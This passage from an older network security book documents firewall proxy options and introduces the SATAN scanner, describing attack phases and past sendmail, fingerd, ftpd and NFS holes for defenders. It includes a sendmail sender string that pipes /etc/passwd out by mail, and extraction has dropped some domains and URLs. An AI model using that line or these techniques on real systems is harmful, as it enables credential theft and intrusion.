Optionstn-gw reads its configuration rules and permissions information from the firewall configurationtable netperm-table, where it retrieves the rules specified for “tn-gw.” The following configura-tion rules are recognized:

userid user

This option specifies a numeric user-id or the name of a password file entry. If this value isspecified in-gw will set its user-id before providing service. Note that this option is includedmostly for completeness; tn-gw performs no local operations that are likely to introduce asecurity hole.

directory pathname

directory specifies a directory to which tn-gw will chroot(2) prior to providing service.

prompt string

The prompt option specifies a prompt for tn-gw to use while it is in command mode.

denial-msg filename

denial-msg specifies the name of a file to display to the remote user if he or she is deniedpermission to use the proxy. If this option is not set, a default message is generated.

timeout seconds

The timeout option specifies the number of seconds the system should remain idel before itdisconnects the proxy. Default is no timeout.

welcome-msg filename

welcome specifies the name of a file to display as a welcome banner after a successful connec-tion. If this option is not set, a default message is generated.

help-msg filename

The help option specifies the name of a file to display if the “help” command is issued. If thisoption is not set, a list of internal commands is printed.

denydest-msg filename

The denydest-msg option specifies the name of a file to display if a user attempts to connect toa restricted remote server. If this option is not set, a default message is generated.

authserver hostname [portnumber [cipherkey]]

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The authserver option specifies the name or address of a system to use for network authentica-tion. If tn-gw is built with a compiled-in value for the server and port, these values will be usedas defaults but can be overridden if specified as above with the authserver clause. If the serversupports DES-encryption of traffic, an optional cipherkey can be provided to secure communi-cations with the server.

hosts host-pattern [host-pattern2 ... ] [ options]

The hosts rules specify host and access permissions. Typically, a hosts rule will be in theform of:

tn-gw: deny-hosts unknowntn-gw: hosts 192.33.112.* 192.94.214.*

Several host patterns may follow the “hosts” keyword; the last pattern appears right before theoptional parameter, which begins with “-”. Optional parameters include:

-dest pattern-dest pattern1 pattern2 ...

-dest specifies a list of valid destinations. If no list is specified, all destinations are consideredvalid. The -dest list is processed in the order it appears on the options line. -dest entriespreceded with a “!” character are treated as negation entries. For example, the following rulepermits hosts that are not in the domain “” to be connected.

-dest !* -dest *-auth

The -auth option specifies that the proxy should require a user to authenticate with a validuserid prior to being permitted to use the gateway.


The -passok option specifies that the proxy should permit users to change their passwords ifthey are connected by the designated host. Only hosts on a trusted network should be allowedto change passwords, unless token-type authenticators are distributed to all users.

InstallationTo install tn-gw place the executable in a system area, then modify inetd.conf to reflect theappropriate executable path. The telnet proxy must be installed on the telnet port (port 23) tofunction properly. This is because many client-side implementations of the telnetd commanddisable options processing unless they are connected to port 23. In some installations this maycause a dilemma.

In a conventional firewall, where the proxy server is running on a system that does not supportuser access, one solution is to install tn-gw on the telnet port, and to install telnetd on anotherport so that the systems administrator still can access the machine. Another option is to permit

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rlogind to run with netacl protecting it so that only a small number of administrative machinescan even attempt to log in. Verify installation by attempting a connection, and monitoring thesystem logs.

x-gw—X Gateway Service

Synopsisx-gw [display/hostname]

Descriptionx-gw provides a user-level X connection service under tn-gw and rlogin-gw access control.Clients can be started on arbitrary Internet hosts, and can then request to display on a virtualdisplay running on the firewall. When the connection request arrives, x-gw pops up a windowon the user’s real display asking for confirmation before permitting the connection. If granted,x-gw passes data between the virtual display and the user’s real display.

To run X through the firewall, exceptions have to be made in router configuration rules topermit direct connectivity to ports from 6000 to 6100 on internal systems. x-gw searches foran unused lowest port for the X connection, starting from 6010 and listening for connections.

Each time an X client application on a remote system starts, a control connection windowpops up on the user’s screen asking for confirmation before permitting the connection. Ifgranted, the connection is handled by an individual x-gw child daemon to serve multiplesimultaneous connections separately with its own buffed data flow. The child daemon cleansup the buffed data and exits if a connection is closed by either end.

ExampleThe following example illustrates establishing a connection through the telnet proxy, andstarting the X gateway:

sol-> telnet wxuTrying to character is ‘^]’ telnet proxy (Version V1.3) ready:tn-gw-> xtn-gw-> exitDisconnecting...Connection closed by foreign host.

A window pops up on the user’s screen showing the port number of the proxy to use, and actsas the control window. Clicking on the exit button will close all multiple simultaneous Xconnections.

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The display option specifyiesa destination display where the user wants applications to appear.By default x-gw will use the connecting host name followed by port number: 0.0, if theargument is not specified. The 0.0 port is also a default number if the user sets the display to ahost name.

InstallationTo install x-gw place the executable in a system area, then modify netperm-table to reflect theappropriate executable path. The location of x-gw is compiled into the components of thefirewall Toolkit in tn-gw and rrlogin-gw, based on the netperm-table.

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429SATAN and the Internet Inferno

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SATAN and the Internet Inferno







8e walked together towards the shining light,

discussing things that here are best kept silent,

as there they were most fitting for discussion.”

—Dante Alighieri, Inferno

Some people think that open discussion of network

security problems is an invitation to disaster. Claiming

“security through obscurity” to be an additional layer of

protection, they are content to trust software creators

and vendors to protect their systems. The release of the

SATAN program in April 1995 created an uproar

with this group. A few of them even tried to get the

government to halt SATAN’s release.


Click anywhere on this page to jump to the Contents at a Glance page.

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SATAN, a Unix program that quickly checks for the presence of vulnerabilities on remotesystems, offers an easy way for the average user to quickly examine the network security ofcomputer systems. Although a few other similar programs had been available before, includingan early version of SATAN, no other program ever caught the imagination of the media to theextent that SATAN did. The interesting name, the uniqueness of one of the creators, and thetopic of Internet security certainly added to the publicity of SATAN; however, SATAN didcontribute materially to network security monitoring in other ways.

SATAN features an easy-to-use interface, an extensible framework, and a scaleable approach tochecking systems. First, the user interface consists of HTML pages that are used through aWeb browser such as Mosaic or Netscape. A user can learn quickly and easily to use SATANby pointing and clicking on these Web pages. Second, although SATAN is available withseveral security tests built in, the general structure of SATAN permits a user to easily addadditional probes. Finally, SATAN can easily be used to check many systems in a quick,automated scan. These three innovations made the release of SATAN a significant advance inthe field of network security programs.

The primary contribution of SATAN, however, is its novel approach to security. It takes theview that the best way a system administrator can ensure the security of a system is by consid-ering how an intruder would try to break into it. The creators of SATAN first created theprogram to automate attacks, described in a paper called “Improving the Security of Your Siteby Breaking Into It” (Farmer & Venema, 1993).

An analogy might clarify the importance of SATAN. In some ways, the Internet can becompared to an electronic version of a large neighborhood. If, one night, you forget to lockone of your windows in your neighborhood, it may not matter. If you live in a nice neighbor-hood, you might leave it open on purpose. However, if a burglar tried to break into your houseon the night that a window was left open, it would certainly simplify his job.

Now, imagine that someone invented a device that would scan a neighborhood and report allthe houses that had windows or doors unlocked. In the hands of a conscientious apartmentmanager or policeman, such a tool would help to ensure the safety of the neighborhood. In thehands of a burglar, however, such a tool would make finding a vulnerable home quite easy.SATAN is that device for the Internet.

Using SATAN, hackers anywhere in the world can scan every networked system on theInternet. These potential intruders do not have to be particularly bright, because SATAN iseasy to use. These intruders do not have to have accounts on the target systems, or even be inthe same country as the systems, because the Internet offers worldwide connectivity. Theseintruders do not even have to know about the existence of the systems, because network rangescan be used for targets.

For a conscientious system administrator, SATAN can be used to ensure the safety of thenetworked hosts. However, because every intruder in the world can quickly identify vulnerablehosts, it “raises the bar” of required security to new heights. If you “live in a nice neighbor-hood,” meaning that your network is behind a well-maintained firewall and the vast majority

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of users are trustworthy, you may not need as much security. However, for hosts directly onthe Internet, relying on the obscurity of open windows is no longer acceptable. The windowsmust always be locked.

Before describing the SATAN program in great detail, this chapter investigates the nature ofnetwork attacks. A detailed explanation of how a hacker, with nothing more than Internetaccess, would manually gather information about a target is then presented. Next, the exactdetails on the security holes searched for by SATAN are studied, as well as other networkholes. Finally, SATAN is examined, including an example of extending SATAN to cover a newsecurity problem.

The important message that SATAN brings is this: thinking like an intruder can help you toimprove the security of your systems.

This section describes some of the general issues surrounding network security, the topic thatSATAN was designed to investigate. Although no designer consciously puts security holes intosoftware, tensions frequently exist between a software program’s ease of use, its functionality,and its security. Such tension, combined with the ever-present opportunity for programmingmistakes by the software designers, have frequently resulted in software programs that includesecurity holes. Add configuration errors (netgroup mistakes), user shortcuts (xhost +), andorganizational policy mistakes (NFS servers on the Internet) to these design flaws, and theresult is a catalog of vulnerabilities for a wily intruder to prey upon.

The Nature of Network AttacksSome network engineers say that the only way to ensure a networked computer system’ssecurity is to use a one-inch air gap between the computer and the network; in other words,only a computer that is disconnected from the network can be completely secure from networkattacks. Although this is a drastic solution, there is always a trade-off between offering func-tionality and introducing vulnerabilities.

An organized attack on your system will attempt to compromise every software service youoffer to the network, such as an FTP archive or web server. For example, permitting electronicmail to cross from the Internet into your internal organizational network means that thefirewall must have a network daemon, such as sendmail, listening on the SMTP port (TCP/25)and willing to enter into an SMTP protocol exchange with anyone on the Internet. If there areweaknesses in the protocol, errors in the design of the daemon, or misconfiguration problems,your system and network may be vulnerable. Even though an Internet service, such as NCSA’shttpd web server, may be considered quite secure today, new releases may introduce vulner-abilities. For example, the introduction of the SITE EXEC command in newer versions of ftpdled to the introduction of a security vulnerability. Administrators must be vigilant againstassuming the long-term security of any Internet service. As new vulnerabilities are discovered,administrators can add scans to SATAN to search for these vulnerabilities.

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The network protocols themselves can be made secure. New servers that implement themodified protocols must be used, however. A protocol and service is “secure enough” when ithas only ITL Class 0 vulnerabilities, as explained later in this chapter. For example, protocolssuch as FTP or telnet, which currently send the password in the clear over the network, can bemodified to use encryption. Network daemons, such as sendmail or fingerd, can be made moresecure by vendors through code review and patching. However, misconfiguration problems,such as the improper specification of netgroups, can lead to vulnerabilities. Also, organizationalpolicies can be very difficult to enforce. For example, even though the IT department of anorganization recommends that all computer systems avoid using “+ +” in .rhosts files, it can bedifficult to enforce this rule. The IT deparment can use SATAN to enforce organizationalpolicies by periodically using SATAN to scan all the hosts in the organization.

It is rare to find an organization that has complete control over its computer network. Onlythe smallest organizations can easily claim daily control over the configuration of all theircomputer systems. In a large organization, policies and IT groups can and should try to setguidelines for systems, such as not permitting unrestricted NFS access, but the distributednature of networked systems make this control uncertain.

Many groups and individuals are able to make daily configuration changes to systems on thenetwork, and one vulnerability on any host can endanger the entire network. For example, 500computers on the U.S. Department of Defense’s Milnet network were successfully attacked inearly 1995 because of a single unauthorized Internet gateway that accidentally offered avulnerability (Leopold, 1995).

With such a dynamic and distributed environment, frequent automated verification is avaluable tool for control. An IT organization can use SATAN to gain such control.

Internet Threat Levels (ITL)Before looking at potential holes, it is useful to create a classification scale to categorize securityholes. This has not been done previously and is introduced in this book as a suggestion forvendors and organizations when prioritizing security problems. This is called the InternetThreat Level scale, or ITL scale. The lowest threat falls into ITL Class 0, and the greatest threatfalls into ITL Class 9. Table 8.1 provides descriptions of each ITL Class.

Most security problems can be classified into three major categories, depending on the severityof the threat posed to the target systems:

■ Local threats

■ Remote threats

■ Threats from across firewalls

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These classifications can be further split into three finer degrees:

■ Read access

■ Non-root write and execution access

■ Root write and execution access

The denial of service attack does not fall cleanly into any category and is listed as ITL Class 0.

Table 8.1The Internet Threat Level (ITL) Scale

Class Description

0 Denial of service attack—users are unable to access files or programs.

1 Local users can gain read access to files on the local system.

2 Local users can gain write and/or execution access to non–root-owned fileson the system.

3 Local users can gain write and/or execution access to root-owned files on thesystem.

4 Remote users on the same network can gain read access to files on the systemor transmitted over the network.

5 Remote users on the same network can gain write and/or execution access tonon–root-owned files on the system or transmitted over the network.

6 Remote users on the same network can gain write and/or execution access toroot-owned files on the system.

7 Remote users across a firewall can gain read access to files on the system ortransmitted over the network.

8 Remote users across a firewall can gain write and/or execution access to non–root-owned files on the system or transmitted over the network.

9 Remote users across a firewall can gain write and/or execution access to root-owned files on the system.

Fixing every security problem and installing every security patch can be an expensive proposi-tion. It might be useful to classify the severity of the threat in order to allocate resourcesproportional to that severity. For example, if an analysis of your system revealed five Class 1holes and one Class 9 hole, it would probably be wise to allocate resources toward closing theClass 9 hole. It may not even be necessary to close the Class 1 holes, depending on theimportance of the data on the system.

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The threat level of a security vulnerability must be weighted by at least several factors:

■ The purpose of the system

■ The secrecy of the data on the system

■ The importance of data integrity

■ The importance of uninterrupted access

■ The user profile

■ The system’s relation to other systems (Is it trusted by other systems? Does it NFSexport a file system?)

Trade-Offs between Environment and VulnerabilitiesClass 1 through 3 problems are typically not so critical that the system must be stoppedimmediately. System administrators frequently have control over local users to an extent thatthese problems are not exploited, at least not maliciously. For example, in a company setting, adepartment system is used only by members of that department, and exploitation of holes doesnot go unnoticed.

Class 4 through 6 problems are much more serious, because non-electronic control over theintruders is no longer simple. However, in many corporate or organizational environments, themajority of systems are behind firewalls, and the majority of members of that organization canbe trusted, to some extent. For systems directly connected to the Internet, these problems areextremely serious. SATAN specifically searches for vulnerabilites in the Class 4 to Class 6range.

Class 7 through 9 problems are very serious problems; with Internet access a requirement formost organizations, firewalls are the only barrier between a company’s most guarded data andintruders. A security hole that can cross a firewall is serious enough for an organization toseriously consider an immediate disconnection from the Internet—not a decision to be takenlightly. SATAN does search for vulnerabilities in this range. Most organizations only connectto the Internet through a firewall system that offers a limited amount of network services, haspacket filtering, and is frequently scrutinized by system administrators. Under these condi-tions, SATAN should not find many vulnerabilities in this range. One such SATAN scan is thesearch for a recent version of sendmail: sendmail is nearly always run on firewall systems, andholes in the older versions of sendmail permitted intruders to cross the firewall.

A multiuser system intended for payroll management would find a Class 1 hole to be muchless tolerable than a single-user workstation intended for CAD designs. For example, itprobably would not be acceptable to allow a contractor to view the current paycheck of theCEO, though it would be acceptable for an engineer to view the contents of the shadowpassword file.

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A multiuser system that served as an inventory control machine for many users might findClass 3 holes to be a much greater threat than Class 7 holes because of the great importance ofuninterrupted uptime. For example, permitting someone on the manufacturing floor to writeroot-owned files, such as the number of CD-ROM players in the stockroom, would be more ofa realistic problem than the threat of a remote user reading through large numbers of filesindicating the stocking level of parts.

A system with sophisticated users might be vulnerable to Class 3 holes also, because such usersmight want to exploit these holes for making configuration changes outside the official systemadministration path; for example, a system used by many programmers to do builds of softwarepackages might be vulnerable to a Class 3 hole when one user uses the hole to make changes todisk quota settings, makes a mistake, and causes the system to crash. All the other program-mers who depend on the system to build software packages are now unable to do their work.

System ClassificationsThe U.S. DoD (Department of Defense) created a computer security classification scale ina document called the “Orange Book” (DOD, 1985a). Computer systems were classified asA-level, B-level, or C-level, with A-level being the most secure and each of these levels havingsubcategories. Most Unix systems are C-level, with some claiming C2 compliance or certifica-tion. Some Unix systems offer variants that are B-level.

An alternative baseline for security classifications could be based on the aforementioned ITLclass ratings: a system could be branded based on its highest ITL class problem. For example, asystem running a standard NFS server and exporting a file system for read-only access wouldbe at least an ITL Class 5 system. The ideally secure system would be an ITL Class –1 system,probably corresponding to a system that is disconnected from the Internet. The highestsecurity obtainable for a standard Internet Unix system is an ITL Class 0 rating, and vendorsshould be readily able to provide patches to permit customers to obtain this level of security.

SATAN attempts to classify systems based on the severity of vulnerabilities found. SATAN’sclassification system, and how it corresponds to the ITL class ratings, is presented later in thischapter. It would be quite useful if SATAN used the ITL classification scale: a numerical indexis a much better tool for comparing systems and allowing an organization to manage a largenumber of computers. For example, an IT group could set goals of “less than 10% of allsystems are ITL Class 4 or higher,” and use SATAN to run periodic scans to enforce thispolicy—in a dynamically changing environment, only SATAN, or some other similar tool,would be able to enforce such a policy.

Common Attack ApproachesBefore looking at common attacks, it is useful to characterize the attack. Attacks can be madeagainst a particular system or a particular organization.

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When attacking an organization, attacks can be oriented to look for mistakes due to thedistributed control of the systems. An intruder needs only a single window of opportunity toenter the network. Such attacks focus on breadth rather than innovation. For example, if Iwanted to attack the U.S.’s DoD Milnet network, it would probably be most expedient tosearch all the Milnet gateway systems for one that ran old versions of sendmail, offeredunrestricted NFS exports, or ran an NIS server, rather than trying to find a new vulnerabilityin the HTTP protocol.

Attacks against single hosts might take advantage of weaknesses in that host as well as vulner-abilities in “nearby” systems, that is, systems that are trusted by the target system, systems thatare connected to the same physical network, or systems that have the same users. In the firstcase, attackers can try to masquerade as the trusted system or user using IP spoofing and DNScache corruption. In the second case, attackers can try to install packet sniffers that will capturetraffic going to and from the target system. In the final case, attackers can try to find userpasswords and try them on the target system.

Note For more information on spoofing and sniffing, see Chapter 6.

In general, most attacks follow three phases:

■ Get access to the system

■ Get root access on that system

■ Extend access to other nearby systems.

Phase One: Get a Login AccountThe first goal of any attack on a Unix system is to get a login account and a password. Theattacker wants to get a copy of the encrypted passwords stored in /etc/passwd or an NIS map.Once they have the passwd file, they can run Crack on it and probably guess at least onepassword. Even though policy guidelines and system software try to enforce good passwordselection, it rarely happens.

Note Crack is a program originally created by Alec Muffett of Sun Microsystems. It tries toguess passwords, encrypt these guesses, and compare the encrypted guesses to theencrypted fields of each user account in a password file. By using some intelligentrules, such as permutations on the login name, and a user-provided dictionary ofwords and names, which can be as large as the user specifies, Crack can besurprisingly effective at quickly guessing passwords. With even a simple dictionaryof a few hundred common passwords, Crack has a good likelihood of cracking anaccount in minutes. With a megabyte dictionary, Crack may run for a few days, butit has a high chance of finding even obscure passwords. See Appendix B, “InternetSecurity References,” for the FTP location of Crack.

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How does an attacker get a login to a target Unix system? First, the hacker gathers informationabout security holes that exist in different Unix products and ways to exploit these holes.Second, the hacker gathers information about a target organization’s computer systems andnetworks. Finally, the hacker matches the opportunities with the vulnerability information andattempts to gain a login into the system.

It is true that other attacks can occur, most notably the denial of service attack (described indetail later in this chapter); however, the attempt at gaining login access appears to be the mostdangerous and frequent.

SATAN specifically addresses remote vulnerabilities. This chapter demonstrates a step-by-stepprocedure of how an intruder would implement the first phase of an attack.

Absurd as this may sound, the legal implications of running a program such asCrack may be quite severe. In early 1995, Randall Schwartz, author of several bookson PERL, was convicted in Oregon, along with other charges, of running Crackagainst the /etc/passwd file of an Intel Corporation system. Even though he wasworking for Intel as a security consultant, Intel had not authorized him to run Crack.Be certain that your company permits you to run Crack before attempting to do so.

Phase Two: Get Root AccessThe second phase of an attack is not necessarily a network problem. The intruder will try toexploit existing holes on a particular Unix system, such as trying to find a set-uid root script, inorder to gain the ability to run as root. Some network problems, such as unrestricted NFSaccess with root permissions for reading and writing, can be used to gain root access. SATANreally does not specifically investigate this area of an attack—instead, SATAN scans for phaseone problems that permit a remote user to gain access to the system at either a user or rootlevel. A better tool for this second phase might be COPS, another program from the makers ofSATAN (see Appendix B for details on getting COPS).

The appropriate way for a system administrator to protect a system from this attack is toclosely follow security advisories from vendors, CIAC, and CERT, and install patches as theybecome available. Careful configuration and setup can help to minimize potential vulnerabili-ties. If a hole exists that permits the user to act as root, the intruder can possibly still be caughtby tracks left in utmp/wtmp. (All currently logged in users are listed in the utmp file. A historyof all logins and logouts are transferred from the utmp file to the wtmp file. The “last”command will format the wtmp file and provide a complete listing of all logins, includinginformation on the source of the login and the duration of the login.) However, not allprograms leave entries in the utmp/wtmp files: remsh/rsh execute commands on the remotesystem without making any entry into the utmp/wtmp file. The syslog files are also extremelyuseful in monitoring system activity. Security monitoring programs exist that offer additionaltracking capabilities.


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Programs that permit users to gain superuser access, such as sudo, .do, !, sys, or osh, should beoffered to users on a time-limited basis, such as an automatic 24-hour limit, to minimize rootexposure. Some of these programs, such as osh, provide for control over what root actions arepermitted, decreasing the scope of damage that could occur. Regardless, the root passwordshould be changed frequently, and control on login locations for root (console only) should beconsidered. (This is described in detail in the “Passwords” section of this chapter.)

Phase Three: Extend AccessAfter the intruder has root access, the system can be used to attack other systems on thenetwork. Common attack approaches include modifications to login daemons to capturepasswords (ftpd, telnetd, rlogind, login), addition of packet sniffers that capture the passwordsof network traffic and send them back to the intruder, and masquerade attacks that attempt touse trust to gain access.

As mentioned before, SATAN specifically focuses on the first phase of an attack, and offerssome help in the second phase. SATAN does not typically play a role in this third phase. Usingthe burglar analogy, SATAN helps to locate a car in the parking lot that has an unlocked doorand indicates which door is unlocked (first phase). Then the burglar either looks for car keysleft above the visor, or hotwires the car (second phase). Finally, this third phase involvesdriving the car around the parking lot to find other cars that are unlocked. As SATAN mayhave gathered information about other important hosts (NFS servers or NIS servers), this thirdphase may use that information to focus attacks on gathering access to those systems.

In general, once an intruder has control of your system, there is little you can do. A competentintruder can easily cover his tracks by modifying accounting and auditing records. Someenterprising hackers have even built automated programs that completely hide all traces oftheir presence; one popular version of this is called rootkit. This package comes with source forprograms such as ps, ls, sum, and who; the system administrator is no longer able to determinethe integrity of binaries because the sum command gives tainted information. Similarly, the pscommand does not show the admin programs run by the intruder. Fortunately, rootkit is quitedifficult to find—the primary distribution method has not been through FTP archives.

If you suspect that an intruder has gained root access to your system, you should get a freshcopy of admin binaries such as sum or md5 and check the checksums of binaries against theoriginal versions on the distribution CD. The COPS program can help do this. Anothersimilar program, Tripwire, offers similar functionality to COPS.

An Overview of HolesAt this point, the general approach of a network attack should be clear. To explore the firstphase of an attack, you should now investigate details on security holes that have been closedin popular Internet services. The following holes have been patched by most vendors andannounced by CERT or the vendors; however, similar holes are frequently re-opened in new

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releases, and many system administrators are slow to apply patches. This should clarify the factthat system administrators should install vendor patches as soon as they are released.

Unlike misconfiguration errors, which are described in detail later in the chapter, these securityholes have arisen due mostly to software programming mistakes in the network daemons.Although the core set of scans included in SATAN does not include each of these holes, addingscans for the following holes to SATAN would be quite straightforward. An example of addinga scan to SATAN is included at the end of this chapter.

Note A useful paper by Landwehr (Landwehr et al., 1993) gives a breakdown of thesource of 50 security flaws. Of these 50 security holes, 9 were introduced becauseof user configuration errors, 3 were introduced by the vendor during code mainte-nance (patches), and the remaining 38 were introduced by the software designersduring the design and creation of the program.

sendmail -d Debug HoleA recent sendmail hole involved the -d command-line option, which permits a user to specify adebug level. All users must be able to invoke sendmail in order to send mail. By specifying avery large value to the debug option of sendmail, a user could overwrite the stack frame andcause unexpected commands to be executed. This was fixed by adding a range check to thepassed values. SATAN scans for versions of sendmail that are old enough to include thissecurity hole.

sendmail Bounce to Program HoleBy specifying a user such as |/bin/mail [emailprotected] < /etc/passwd as the sender of amessage, and then indicating a bad recipient name, sendmail would accept the message,attempt to send to the bad recipient, realize that user did not exist, and bounce an errormessage back to the sender. The sender would in reality be a program that executed, causing amalicious action such as mailing the passwd file. Sendmail was not smart enough to preventsenders from being programs. Once again, SATAN scans for versions of sendmail that are oldenough to include this security hole.

sendmail syslog Buffer Problemsendmail, along with many other programs, uses syslog() calls to send information to thesyslogd daemon. The buffer dedicated to reading syslog() writes in the syslogd daemon doesnot look for overflows. The syslog() call would invoke the vsprintf() libc call and overflow thestack frame for the vsprintf() call. The vsprintf() call was modified to prevent an overflow ofthe stack frame. A hacker script was made available to gain root access on Sun OS systems bywriting long information into the appropriate fields of an SMTP transfer, causing the remotesendmail to invoke a root shell.

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fingerd Buffer ProblemOne of the vulnerabilities exploited by the famous Internet worm, fingerd would read a line ofinformation using the gets() call. The buffer allocated for the string was 512 bytes long, butthe fingerd program did not check to see that the read was greater than 512 bytes beforeexiting the subroutine. If the line of information was greater than 512 bytes, the data waswritten over the subroutine’s stack frame return address location. The stack could be rewrittento permit the intruder to create a new shell and execute commands.

The Internet worm wrote 536 bytes of information to the gets() call, with the overflowing 24bytes consisting of VAX assembly language code that, upon return from the main() call, triedto execute a shell by calling execve(“/bin/sh”,0,0).

hosts.equiv Username ProblemIf a username was specified in the hosts.equiv file, in addition to the hostname, that user onthat remote host could specify the username of any user on the system and gain access. Forexample, if the system george had an /etc/hosts.equiv that contained the line halifax julie, theuser julie on the remote system halifax could gain access as any user on system george. This wascaused by the ruserok() libc routine, which tried to leverage the code from the .rhosts checkusing a goto call.

SSL httpd Randomization ProblemThe Netscape Navigator implementation of SSL had a flaw of using a predictable randomnumber generator. (SSL stands for Secure Sockets Layer, a protocol that permits authentica-tion and encryption—the implementations of this protocol involve the use of a library ofroutines that permit a nearly drop-in replacement of standard socket calls. SSL is more fullyexplained later in this chapter in the section “SSL.”) So, even though the encryption usedIDEA, RC4-120, or Triple-DES, in which the key size is over 120 bits, the key was generatedwith a random number chosen from a 16- to 32-bit space. A brute force search of all possiblerandom numbers could quickly find the chosen value and therefore find the session key. Theproblem with session keys is that they depend on good random numbers, and no computer cancurrently easily create a good random number. This is a weakness for all cryptographic systems.RFC 1750, Randomness Requirements for Security, attempts to address this issue. Interest-ingly, Netscape offered their implementation to public review via the Internet ( to try to strengthen the randomness of thealgorithm.

TCP Sequence Guessing ProblemEven though a system has turned off support for the IP source routing option, an intrudercan fool that system into believing that it is communicating with a trusted host. The intruderfirst initiates a TCP connection to the target system using a true IP address, then exits the

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connection. The intruder now initiates a new connection using the IP address of a trustedsystem. For example, the target has a hosts.equiv file that indicates host B to be trusted. Theintruder makes connection to the remshd port (shell 512/TCP) with the IP address of thetrusted system. To carry on the masquerade, the intruder needs to ACKnowledge each TCPpacket from the target. Because the algorithm for choosing the next sequence number for anew TCP connection was predictable, the intruder could easily guess it. So, when the targetsystem sent the response packet to the real trusted system, which discarded it because no activelistener was available, the intruder quickly sent back the appropriate acknowledge packet tocomplete the TCP connection. The intruder would then gain access through the rcmds andthe hosts.equiv trust by hostname mechanism.

The solution to this problem is to make the sequencing between new TCP connections moredifficult to guess, by randomizing it. Although this does not prevent an intruder from guessingit, it does make guessing much more difficult. Most intruders do not have direct access to thephysical network via a sniffer, so they cannot hijack existing connections using this mecha-nism. If they do have physical access, hijacking of existing connections can be done. For adeeper analysis, see the paper by Bellovin (Bellovin, 1993).

ftpd Server Bounce ProblemThe proxy server feature of ftpd was created to permit third-party transfers of files. A user canrequest a proxy transfer from one ftpd to another remote ftpd. This feature, actually specifiedin the RFC requirements, when combined with the quote command, the PORT statement,and the PASV statement, permits a user to avoid IP access controls and traceability.

The core of the problem is that a user can request a remote ftpd server to send a file to any IPaddress and TCP port. So, the user could request the remote ftpd to send a file containingvalid network protocol commands to a server program listening on any TCP port on any host,causing that server to believe that the source of the network protocol connection is the remoteftpd.

Imagine, for example, that a user in France wants to FTP a file from MIT that is available onlyto U.S. users. The MIT ftpd screens out IP addresses from outside the U.S., in an attempt tocomply with U.S. export restrictions of cryptographic material. The French user connects toanother U.S. ftpd and logs in as an anonymous user. The French user ftps to her own machineand puts it into a PASV mode, then does a STOR of a new file, say foobar. The French usernow anonymously sends a text file containing FTP protocol statements to the U.S. ftpd. Thesestatements include a PORT command with the IP address and port number of the French ftpdthat is doing a passive listen and STOR, as well as a subsequent RETR to retrieve the desiredfile.

The French user now specifies a quote PORT command to the U.S. ftpd that indicates theFTP control port (21) on the MIT machine. Finally, the French user specifies a quote RETRcommand to the U.S. ftpd for the text file containing the command statements. The U.S. ftpd

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sends this file containing the port address of the waiting French ftpd in a PORT command,along with the appropriate commands for getting the desired files, to the MIT machine, whichapproves the U.S. IP address and sends the file to the French ftpd, which is still waiting withthe STOR command to retrieve the file called foobar. The MIT file is therefore sent to theFrench ftpd and stored as foobar on that site, whereas the MIT ftpd logs indicate that the filewas sent to the U.S. ftpd.

This same approach could be used to send protocol packets to any port on any system throughthe bouncing ftpd, thereby hiding the true IP address of the originating sender. Completelyuntraceable e-mail or Usenet news postings could be done this way, which would be a benignuse of this hole. A malicious user would be able to completely fool any IP address restrictionson a target system.

The only way to avoid this is to turn off proxy functionality completely. See the paper at for full details on this hole and the suggested fix to ftpd.

portmap ForwardingThe portmap program forwards mount requests to the rpc.mountd and causes them toappear to originate from the IP address of the system running portmap. This eliminates IPsource restrictions on NFS servers from taking effect. SATAN does a scan for this portmapvulnerability.

World-Writeable Mail Directory and LinksWhen the /var/mail directory is world-writeable, any user can create a file in that directory. If auser created a link from a username to an outside file, sendmail’s delivery agent, such as /bin/rmail, would write the incoming mail file to the linked file. Imagine if a user created a linkfrom /var/mail/root to /etc/passwd. The user could then mail a new username to root and haveit appended to /etc/passwd. The /var/mail directory should never be world-writeable.

NFS uid 16-Bit ProblemAn NFS server depends on client-side authentication, verifying only the source IP address ofthe request, so claiming to fix an NFS server vulnerability is a tenuous claim at best. In general,root access to files on an NFS server require an explicit statement in the exports file; otherwise,root client requests have their uid mapped to –2 (nobody), which restricts their access toworld-accessible files.

However, a user that claimed a client uid of 0 + 2^16 = 65536 would be acceptable to NFSand not get remapped to a new uid. When that user requested access to a root-owned file, thecomparison of uids would use only the lower 16 bits of the uid, allowing this user to masquer-ade as root.

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arp -f ProblemThe arp program uses an -f flag to permit a user to specify a file containing an arp cache to beread. If that file is in an unacceptable format, arp prints out the contents as an aid for debug-ging. This means that a regular user can read any root-owned file on the system by specifyingthat file to arp using the -f option.

sendmail -C Problemsendmail permits the invoker to specify a configuration file. Because any user can invokesendmail (this is required to be able to send mail), and because sendmail does a set-uid to root,this means that sendmail can read any root-owned file. The vulnerability was that if the filespecified was an unacceptable choice, sendmail would print the contents out as an aid fordebugging. This meant that a regular user could read any root-owned file on the system byspecifying that file to sendmail using the -C option.

rwall Writing ProblemA user could create an entry into the utmp file of current users that really represented afilename. Then invoking rwall to send a message to all users would result in that message beingwritten to that file. A new /etc/passwd file or a /.rhosts file could be written by using theappropriate message. This problem was a result of the fact that the utmp file could be modifiedby a regular user.

Note Advice to designers: Notice that several of the security holes are based on the samecommon mistakes. Programs that avoid range checking on strings or values that canbe passed in by the remote user (syslog, fingerd, sendmail debug), resulting in thestack frame being overwritten are continually being found. Programs that havehigher privileges and can manipulate files, by either reading and printing them outor writing them and allowing a user to specify the pathname (write the log to /etc/passwd) or to create a link from the standard pathname, are frequently seen. Client-side authentication is not acceptable, yet many programs continue to think that if asystem administrator on the client system approves authentication, security ismaintained—surprisingly, many hackers double as system admins for their systems.Finally, security that depends solely on hostname or IP authentication can be easilycircumvented.

Learning about New Security HolesSATAN is distributed with scans for only a handful of vulnerabilities. Granted, the vulnerabili-ties that SATAN scans for are quite widespread and severe in nature; however, SATANprovides a wonderful framework for easily adding scans for new security holes. A vigilantsystem administrator can easily add new scans (demonstrated later in this chapter), if he or sheknows about new security holes.

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The Internet is a wonderful place to find out about new security holes. Network news, mailinglists, Web sites, FTP archives, and vendor patches all help to identify new security issues. Thesection at the end of the chapter contains a detailed list of network sites and mailing lists.

The best place to start is with the network newsgroups. Although new groups are always beingcreated, a core set of useful groups can always be depended upon:,, and are the primary groups that deal with security. A fewothers, such as,, alt.2600, andsci.crypt, are occasionally useful, although these groups contain quite a bit of theory ornoise. Although books and papers can provide you with a good basis for understandingsecurity, it is a rapidly developing field, and the newsgroups are the latest source for updates.

